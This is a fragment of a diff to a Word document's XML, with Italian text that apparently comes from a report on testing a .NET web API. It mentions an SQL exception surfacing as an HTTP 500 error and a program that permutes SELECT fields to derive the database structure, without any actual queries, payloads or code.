+        <w:t xml:space="preserve">ards. L'applicazione .NET ha intercettato l'eccezione SQL sollevando un codice HTTP 500 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Internal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server Error.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
@@ -10199,15 +9470,13 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">La terza fase è stata la generazione del programma per creare le permutazioni dei campi nella SELECT che estrae le tabelle del database e che viene passata in input </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>alla api</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> delle carte.</w:t>
+        <w:t xml:space="preserve">La terza fase è stata la generazione del programma per creare le permutazioni dei campi nella SELECT </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">che ricava la struttura </w:t>
+      </w:r>
+      <w:r>
+        <w:t>del database e che viene passata in input alla api delle carte.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10984,6 +10253,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
